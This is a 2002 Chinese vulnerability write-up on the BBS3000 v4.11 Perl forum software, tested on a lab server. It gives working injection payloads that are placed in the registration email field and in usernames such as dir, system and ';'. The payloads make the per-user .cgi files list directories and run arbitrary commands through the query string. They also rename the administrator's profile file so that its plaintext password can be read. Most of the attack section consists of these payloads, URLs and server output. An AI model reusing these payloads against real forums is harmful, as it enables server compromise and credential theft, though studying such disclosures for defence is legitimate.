窥探YUZI的BBS3000社区安全性--1
窥探YUZI的BBS3000社区安全性--1文章类型:漏洞分析 文章加入时间:2002年1月24日22:24
--------------------------------------------------------------------------------
窥探YUZI的BBS3000社区安全性
—————————————————————————————————
badboy-club@21cn.com
部分漏洞提供者:
adver
x.z
这并不是什么权威教材,只适合菜鸟了解某些免费提供的论坛程序存在的不
安全面,切莫用此方法在国内做尝试,如果你偏要如此,那么由此引起的一
切法律后果由你自己负责。
本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目
的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人
将保留侵权控告的权利。
—————————————————————————————————
第一篇
****基本漏洞测试*****
YUZI的BBS3000被不少的国内个人站点和企业站点用来作为网友交流的论坛,
但不少用户很少去探测这论坛的安全性,使用者很大程度上信任作者,而实际上
这些免费的版本和汉化修改论坛,往往存在一些致命的漏洞,本文的目的在于揭
示该论坛不为人知的漏洞,让大家更好的使用这类论坛,并且保证自身资料的隐
蔽和服务器的安全。
测试版本:bbs3000 v4.11
系统平台:win2k adv server=sp3 + iis 5.0+ActivePerl 5.6.1.626
应用程序映射:perl.exe %s %s 动作:GET,HEAD,POST
或者:perlIS.dll 动作:GET,HEAD,POST
测试情况:
一、用户名为dir的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
在站点建立一目录(或者虚拟目录)bbs3000,按论坛作者提供的说明书,默认安
装BBS3000 v4.11版本,我们注册一用户名为dir,密码为system,信箱为
#badboy@badclub.org(#任意信箱都可以),然后我们在IE地址栏处输入:
http://192.168.0.1/bbs3000/yhzl/dir.cgi
F:\new\bbs3000\bbs3000 的目录
2002-01-1619:26 <DIR> .
2002-01-1619:26 <DIR> ..
2002-01-1622:42 43,247 bbs.cgi
2002-01-1622:47 50,934 cjyh.cgi
2002-01-1622:43 38,551 bbs1.cgi
2002-01-1622:48 6,401 cookie.cgi
2002-01-1622:42 2,138 affiche.cgi
2002-01-1622:43 22,434 bbs2.cgi
(以下略)
34 个文件 417,611 字节
15 个目录1,830,944,768 可用字节
2、采用应用程序映射:perlIS.dll应用程序映射
得到的显示页面为:
'F:\new\bbs3000\bbs3000\yhzl\dir.cgi' script produced no output
测试解释:在应用程序映射中,一个扩展名只能由一个程序去映射,在采用
perl.exe时,BBS3000存在查看网站目录和文件的漏洞,在采用perlIS.dll时,
则有暴露网站在服务器上的绝对地址的漏洞。
二、用户名为system的漏洞
1、采用应用程序映射:perl.exe %s %s应用程序映射
注册一用户名为system,密码为空格键(或者密码为system),信箱为
'dir c:'#@badclub.org,然后我们在IE地址栏内输入:
http://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为:
C:\ 的目录
2001-11-2720:56 1,002 FRUNLOG.TXT
2001-11-2720:49 <DIR> WINNT
(以下略)
10 个文件 29,583 字节
9 个目录 946,327,552 可用字节
当密码为其他时,则显示:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
syntax error at F:\new\bbs3000\bbs3000\yhzl\system.cgi line 1, near
"1 system"Execution of F:\new\bbs3000\bbs3000\yhzl\system.cgi
aborted due to compilation errors.
我们还可以这样测试用户名为system的情况,密码仍然为空格键
(或者密码为system)但把信箱修改为@ARGV##badboy@badclub.org,然后我
们在IE地址栏内输入:
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
返回的页面显示
D:\ 的目录
2001-01-1823:23 <DIR> tools
2001-11-2721:18 <DIR> 98tools
2001-04-0813:08 <DIR> W2Kreskit
2001-11-0619:52 <DIR> NOCDKEY-PROT
2001-12-0121:32 <DIR> WINNT
2001-12-0121:39 <DIR> Documents and Settings
2001-12-0121:41 <DIR> Program Files
2001-12-0121:53 <DIR> Inetpub
2002-01-1619:17 <DIR> pl
(以下省略部分内容)
12 个文件 15,068,818 字节
15 个目录2,371,317,760 可用字节
'0' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
2、采用应用程序映射:perlIS.dll应用程序映射
用户名为system,密码为空格键(或者密码为system),信箱为'dir c:'#@badclub.org,
然后我们在IE地址栏内输入:
http://192.168.0.1/bbs3000/yhzl/system.cgi
返回的页面显示为:
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
把信箱修改为@ARGV##badboy@badclub.org,然后我们在IE地址栏内输入:
http://192.168.0.1/bbs3000/yhzl/system.cgi?dir%20d:
返回的页面显示
'F:\new\bbs3000\bbs3000\yhzl\system.cgi' script produced no output
三、用户名为;字符的情况
1、采用应用程序映射:perlIS.dll应用程序映射
注册一用户名为;字符,密码为1,信箱为rename "badboy.cgi","badboy.txt";#@badclub.org ,
(这里假设badboy为该论坛的社区区长,也就是该论坛最大权限的用户),然后我们
在IE地址栏内输入:
http://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
'F:\new\bbs3000\bbs3000\yhzl\;.cgi' script produced no output
嗯,怎么还是和上面的perl.dll例子一样啊??后面的就是关键了,你再输入这样
的看看
http://192.168.0.1/bbs3000/yhzl/badboy.txt
返回的页面显示为
badpass badboy http://192.168.0.1 2002-01-16
显示的内容前面就是密码、用户
天啊,事情怎么那么容易呀!!~_*
经测试,用户名为system密码为一个空格键(或者为system),信箱为
rename "badboy.cgi","badboy.txt";#@badclub.org 的时候,步骤和上面一样,同样
可以获得相同的结果。
2、采用应用程序映射:perl.exe %s %s应用程序映射
用户名为;字符,密码为1,信箱为rename "badboy.cgi","badboy.txt";#@badclub.org
在IE地址栏内输入:
http://192.168.0.1/bbs3000/yhzl/;.cgi
返回的页面显示
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
页:
[1]